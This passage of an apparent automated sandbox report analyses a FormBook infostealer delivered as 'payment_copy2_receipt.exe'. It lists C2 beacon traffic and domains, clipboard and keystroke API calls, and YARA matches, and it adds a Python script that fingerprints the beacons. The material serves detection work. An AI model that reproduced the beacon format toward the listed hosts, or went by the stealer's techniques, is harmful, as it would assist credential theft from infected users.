    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Tue, 29 Nov 2022 15:43:40 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Server: nginx
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: (one 0x6b-byte chunk of gzip data, not printable; the gzip ISIZE trailer 92 00 00 00 gives an uncompressed length of 146 bytes, the size of the plain nginx 403 page in the next response)
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Tue, 29 Nov 2022 15:43:42 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
    Server: nginx
    Vary: Accept-Encoding
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Tue, 29 Nov 2022 15:44:03 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Tue, 29 Nov 2022 15:44:05 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: payment_copy2_receipt.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: payment_copy2_receipt.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: n5335GITL.12.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/fP
Source: n5335GITL.12.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: n5335GITL.12.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: n5335GITL.12.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: msdt.exe, 0000000C.00000002.514187588.000000000553A000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.coolfashionshop.xyz/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/search?q=
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown | DNS traffic detected: queries for: www.030332.com
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 1_2_004050C0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard,
Source: payment_copy2_receipt.exe, 00000000.00000002.259418578.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 1_2_00404020 GetKeyboardState,
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe | Code function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
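
Every beacon in this section uses the path /veh0/ with the same two parameter names, a GET that carries no User-Agent and seven trailing null bytes, and a POST that forges Origin and Referer to the contacted host; only the domains rotate, and just one of them (www.projectlis.online) appears in the extracted configuration. The Python below is an added example, not part of the Joe Sandbox report. It parses requests of this shape and clusters them by what stays constant across hosts, which is the pivot an analyst wants when the next sample uses a fresh domain list. The sample requests are constructed to mirror the report's traffic with shortened parameter values, and the trait list is this example's, not a Joe Sandbox signature.

```python
"""Fingerprint the FormBook beacons recorded in this section.

Added example; it is not part of the Joe Sandbox report. The sample requests are
constructed to mirror the report's traffic (path /veh0/, parameters 3fiPC and
V8Olq, no User-Agent on GET, a form POST with Origin/Referer pointing at the C2
host). Query and body values are shortened placeholders; only their shape and
which of them repeat matter here.
"""
from urllib.parse import urlsplit, parse_qsl

CAMPAIGN_PATH = "/veh0/"  # from the report's extracted configuration


def parse_request(raw: bytes) -> dict:
    """Split one raw HTTP/1.1 request into method, target, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def request_params(req: dict) -> list:
    """Key/value pairs from the query (GET) or the form body (POST), null padding removed."""
    if req["method"] == "POST":
        return parse_qsl(req["body"].rstrip(b"\x00").decode("latin-1"), keep_blank_values=True)
    return parse_qsl(urlsplit(req["target"]).query, keep_blank_values=True)


def beacon_indicators(req: dict, path: str = CAMPAIGN_PATH) -> list:
    """Return the FormBook-style traits one parsed request exhibits (empty if none)."""
    headers, hits = req["headers"], []
    if urlsplit(req["target"]).path != path:
        return hits
    hits.append("campaign path")
    host = headers.get("host", "")
    if req["method"] == "GET":
        if len(request_params(req)) == 2 and "user-agent" not in headers:
            hits.append("GET: two opaque parameters, no User-Agent")
        if req["body"] == b"\x00" * 7:
            hits.append("GET: seven null bytes after the headers")
    elif req["method"] == "POST":
        if "Trident/7.0" in headers.get("user-agent", ""):
            hits.append("POST: IE11 Trident user agent")
        if (headers.get("origin") == f"http://{host}"
                and headers.get("referer") == f"http://{host}{path}"):
            hits.append("POST: Origin and Referer forged to the C2 host")
        if req["body"].rstrip(b"\x00").endswith(b"."):
            hits.append("POST: form body terminated by '.' plus null padding")
    return hits


def cluster_campaign(raws: list) -> dict:
    """Group beacons across rotating domains by the values that stay constant.

    FormBook walks a list of decoy and real C2 domains with one configuration,
    so a parameter whose value never changes (3fiPC in the report) identifies
    the campaign better than any single hostname does.
    """
    hosts, values = set(), {}
    for raw in raws:
        req = parse_request(raw)
        if not beacon_indicators(req):
            continue
        hosts.add(req["headers"].get("host", ""))
        for name, value in request_params(req):
            values.setdefault(name, []).append(value)
    constant = sorted(n for n, vs in values.items() if len(vs) > 1 and len(set(vs)) == 1)
    return {"hosts": sorted(hosts), "param_names": sorted(values), "constant_params": constant}


def _get(host: str, query: str) -> bytes:
    # Constructed sample: the report's GETs carry no User-Agent and seven trailing null bytes.
    return (f"GET {CAMPAIGN_PATH}?{query} HTTP/1.1\r\nHost: {host}\r\n"
            f"Connection: close\r\n\r\n").encode() + b"\x00" * 7


def _post(host: str, form: str) -> bytes:
    # Constructed sample: the report's POSTs use the IE11 UA and pad the body with eight null bytes.
    body = form.encode() + b"\x00" * 8
    return (f"POST {CAMPAIGN_PATH} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n"
            f"Content-Length: {len(body)}\r\nCache-Control: no-cache\r\nOrigin: http://{host}\r\n"
            "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n"
            f"Referer: http://{host}{CAMPAIGN_PATH}\r\nAccept-Language: en-US\r\n"
            "Accept-Encoding: gzip, deflate\r\n\r\n").encode() + body


SAMPLE_REQUESTS = [
    _get("www.030332.com", "3fiPC=E4O8TXhX80iDs&V8Olq=0RH+IT1kuvDJ9rkR"),
    _get("www.vnsuda.lol", "V8Olq=H0phgvfvKBma6gvw&3fiPC=E4O8TXhX80iDs"),
    _get("www.bem4u.shop", "3fiPC=E4O8TXhX80iDs&V8Olq=4D+PWXbgB4ogRjX6"),
    _post("www.vnsuda.lol", "V8Olq=K2BBjZzqKXW75gn6dWQl9j2NGkiE6cZ07bghup~XuXmtOFu_hKc2."),
    # Constructed benign request on a different path: must not cluster.
    b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: curl/8.4.0\r\n\r\n",
]

if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        req = parse_request(raw)
        print(req["method"], req["headers"].get("host"), beacon_indicators(req))
    print(cluster_campaign(SAMPLE_REQUESTS))
```

Run stand-alone it reports three hosts, the parameter names 3fiPC and V8Olq, and 3fiPC as the only constant parameter; the benign request contributes nothing. Matching on 3fiPC=E4O8TXhX80iDs plus the /veh0/ path catches all five domains in this report without listing any of them, which is the property a network rule needs against a family that rotates decoys.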

E-Banking Fraud

Source: Yara match | File source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: fcvvthv.exe PID: 2828, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: msdt.exe PID: 5440, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: initial sample | Static PE information: Filename: payment_copy2_receipt.exe
          Source: payment_copy2_receipt.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
